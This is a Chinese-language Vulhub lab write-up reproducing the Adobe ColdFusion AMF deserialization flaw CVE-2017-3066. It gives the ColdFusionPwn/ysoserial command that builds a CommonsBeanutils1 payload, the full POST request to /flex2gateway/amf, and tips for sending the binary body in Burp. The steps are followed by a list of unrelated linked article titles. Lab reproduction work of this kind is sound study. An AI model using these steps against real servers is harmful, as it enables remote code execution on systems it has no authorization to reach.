1、漏洞描述

Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。
攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

2、启动靶场

3、访问网址

http://x.x.x.x:8500
发现是404网页,接着去访问
http://x.x.x.x:8500/CFIDE/administrator/index.cfm
发现这个网页和上个漏洞一样,但是这个网页是要输入vulhub,即可成功安装Adobe ColdFusion

3、我们使用ColdFusionPwn工具来生成POC

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

我在centos靶机上执行是不可以的
但是在kali上是可以运行的

4、生成poc.ser文件后,将POC作为数据包body发送给

http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

5、发送poc内容

由于编码问题,如果直接从Notepad++/Notepad里面复制粘贴为body部分,是不成功的,即使返回的状态码是200
正确的方法应该是:
右击选择Paste From File,上传poc.cer文件
再到Raw界面添加HTTP头部,如果成功,并且打算以后还需要用的话,右击选择Copy to File保存

6、进入容器检验poc

通过docekrid进入容器
Docker exec docker容器id -it /bin/bash

7、看到success即为复现成功

Vulhub-coldfusion--CVE-2017-3066相关推荐

  1. linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...

    0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...

  2. php cve 2017 12933,18-017 (March 27, 2018)

    描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...

  3. 2021年第一季度Sumap网络空间测绘CVE漏洞趋势安全分析报告

    前言 本文主要通过网络测绘角度收集各种资产协议的版本号信息,通过比对CVE漏洞影响范围中的版本号方式,进行安全风险趋势分析,无任何实际危害互联网行为.资产在携带版本中也会存在修复补丁后版本不变的情况. ...

  4. Nginx平滑升级到最新版本

    (一)简述: 早上收到nginx最新漏洞的通知,Nginx官方发布最新的安全公告,在Nginx范围过滤器中发现了一个安全问题(CVE-2017-7529),通过精心构造的恶意请求可能会导致整数溢出并且 ...

  5. VMware vCenter Server Appliance Photon OS安全修补程序

    VMware vCenter Server Appliance Photon OS安全修补程序 上次更新时间 2019年12月19日 https://docs.vmware.com/en/VMware ...

  6. 工控系统的全球安全现状:全球漏洞实例分析

    工控系统的全球安全现状:全球漏洞实例分析 一.摘要 ​ 运营技术(OT).网络和设备,即工业环境中使用的所有组件,在设计时并未考虑到安全性.效率和易用性是最重要的设计特征,然而,由于工业的数字化,越来 ...

  7. 宏观视角下的office漏洞(2010-2018)

    奇技指南 本文作者银雁冰:360高级威胁应对团队·高级威胁自动化组 本文来自安全客,原文地址: https://www.anquanke.com/post/id/180067 前 言  本文是对我在B ...

  8. SSRF漏洞(服务器端请求伪造)

    中间人(SSRF就是中间人)攻击,服务端请求伪造,主要攻击内网,打redis和weblogic特别厉害,目标网站的内部系统(他是从内部系统访问的,所以通过它攻击外部系统无法访问的内部系统,也就是目标网 ...

  9. 绿盟科技网络安全威胁周报2017.17 请关注Squirrelmail 远程代码执行漏洞CVE-2017-7692...

    绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-17,绿盟科技漏洞库本周新增84条,其中高危40条.本次周报建议大家关注 Squirrelmail 远程代码执行漏洞 .SquirrelMai ...

  10. PWN2OWN 2017 Linux 内核提权漏洞分析

    0.前言 在2017年PWN2OWN大赛中,长亭安全研究实验室(Chaitin Security Research Lab)成功演示了Ubuntu 16.10 Desktop的本地提权.本次攻击主要利 ...

最新文章

  1. 新建一个Windows Service的方法
  2. RxJava中常见的几种Subject
  3. Java集合篇:HashSet
  4. tcp和udp的区别和三次 四次挥握手 http://www.cnblogs.com/bizhu/archive/2012/05/12/2497493.html...
  5. GO 从零开始的语法学习二
  6. 爱奇艺怎么开启数据流量自动播放
  7. MySQL数据库的权限管理
  8. 第二次作业+105032014149
  9. 效率软件:微软远程桌面安卓版
  10. Product UVA - 10106(大数乘法)
  11. 关于2013年1月21日的DNS故障分析文章
  12. 机器学习笔记 - 单位矩阵和逆矩阵
  13. 【Android -- 技术周刊】第 020 期
  14. 解决img图片底部留白问题
  15. 使用XUL开发跨平台桌面应用
  16. c++ 堆优化版dijkstra 代码实现
  17. 广州橙色优学:Java为什么这么火?Java好学吗?
  18. python--字典、列表
  19. 2023 年值得推荐的 Vue 库
  20. linux超级终端root权限,linux超级终端minicom的使用方法

热门文章

  1. Windows10使用命令行打开3389_内网渗透(实验)之域渗透深入弹shell开3389拿域控
  2. 完美tbody滚动效果
  3. jsp中的https强转访问
  4. HLK 微软驱动签名过程中踩过的坑
  5. 谈谈c++11 emplace_back
  6. 我的姥爷走了,今后再也没有这个严厉而又较真儿的人
  7. 带宽单位和下载速度的换算
  8. 《演员的自我修养》读后感
  9. 未能加载“xxx”程序集
  10. PCB电路板EN 45545-2:2020最新标准的测试要求